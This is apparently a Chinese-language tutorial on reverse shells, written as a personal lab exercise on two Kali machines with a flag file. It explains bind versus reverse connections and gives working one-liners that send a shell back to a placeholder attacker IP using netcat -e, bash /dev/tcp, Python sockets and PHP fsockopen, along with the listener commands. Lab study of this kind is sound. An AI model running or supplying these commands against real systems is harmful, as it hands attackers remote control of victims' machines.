# 反弹 shell:
# 简介;
反弹 shell,就是攻击机监听在某个 TCP/UDP 端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
# 正向连接:
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标 ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web 服务、ssh、telnet 等等都是正向连接。
# 反向连接:
反弹 shell 通常适用于如下几种情况:
- 目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
- 目标机端口被占用。
- 目标机位于局域网,或 IP 会动态变化,攻击机无法直接连接。
- 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的。
对于以上几种情况,我们是无法利用正向连接的,要用反向连接。
反向连接就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,即为反向连接。
# 利用 netcat 反弹 shell:
目前,默认的各个 linux 发行版本已经自带了 netcat 工具包,但是可能由于处于安全考虑原生版本的 netcat 带有可以直接发布与反弹本地 shell 的功能参数 -e 都被阉割了,所以我们需要自己手动下载二进制安装包,安装的如下:
1 | wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz |
安装完原生版本的 netcat 工具后,便有了 netcat -e 参数,我们就可以将本地 bash 反弹到攻击机上了。
# 攻击机开启本地监听:
1 | netcat -lvvp 2333 |
# 目标机主动连接攻击机:
1 | netcat <攻击机的IP> 2333 -e /bin/bash |
# 结果:
首先,我在目标机的根目录存放了一个 flag 文件,之后我尝试在攻击机上读取这个文件:
1 | ┌──(root㉿kali)-[~] |
之后,我们尝试在攻击机上读取 flag 文件:
1 | ┌──(root㉿kali)-[/home/kali/Desktop] |
首先在攻击机上监听了一下 2333 端口,然后用目标机建立连接,这个时候,我们发现成功读取了 flag 文件,后面我还尝试了几个错误的命令,在目标机器上输出了错误信息。
1 | ┌──(root㉿kali)-[~] |
# 利用 Bash 反弹 shell
直接放代码:
1 | bash -i >& /dev/tcp/<攻击机IP>/2333 0>&1 |
- bash -i 打开一个交互的 bash
- >& 将标准错误输出重定向到标准输出
- /dev/tcp/x.x.x.x/port 意为调用 socket, 建立 socket 连接,其中 x.x.x.x 为要反弹到的主机 ip,port 为端口
- 0>&1 标准输入重定向到标准输出,实现你与反弹出来的 shell 的交互
# 攻击机开启本地监听:
1 | nc -lvvp 2333 |
# 目标机主动连接攻击机:
1 | bash -i >& /dev/tcp/<攻击机IP>/2333 0>&1 |
# 结果:
攻击机上,我们尝试读取了下文件:
1 | ┌──(root㉿kali)-[/home/kali/Desktop] |
不过这两个系统都是 kali,倒不是很容易看出来区别是啥?不过,还是把 flag 给都出来了,对了,第一个交互和第二个交互所在的文件夹不同了,这里应该能区分吧。
接下来看看目标机:
1 | ┌──(root㉿kali)-[~] |
发现,没有任何输出,连胡乱输入的命令的报错都没有,说明真的重定向了。
# Python 脚本反弹 shell:
当目标主机上有 python 环境时,我们可以用 Python 来反弹 shell。Python 在现在一般发行版 Linux 系统中都会自带,所以使用起来也较为方便,即使没有安装,我们手动安装也很方便。
# 攻击机开启本地监听:
1 | nc -lvvp 2333 |
# 目标机主动连接攻击机:
1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<目标机IP>",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
# 结果:
先看看攻击机的情况吧,这里很明显能看出来被攻击了,还是 /bin/sh 这个 shell:
1 | ┌──(root㉿kali)-[/home/kali/Desktop] |
目标机器也是,啥输出都没有:
1 | ┌──(root㉿kali)-[~] |
# php 脚本反弹 shell:
当然,CTF 中最经典的 PHP 不能忘了,老样子,
# 攻击机监听端口:
1 | nc -lvvp 2333 |
# 目标机器运行 php 脚本:
1 | php -r '$sock=fsockopen("<攻击机IP地址>",2333);exec("/bin/sh -i <&3 >&3 2>&3");' |
# 结果:
攻击机成功读取到了 flag:
1 | ┌──(root㉿kali)-[/home/kali/Desktop] |
目标机器也没有任何输出:
1 | ┌──(root㉿kali)-[~] |
# 参考:
反弹 shell,这一篇就够了
多种姿势反弹 shell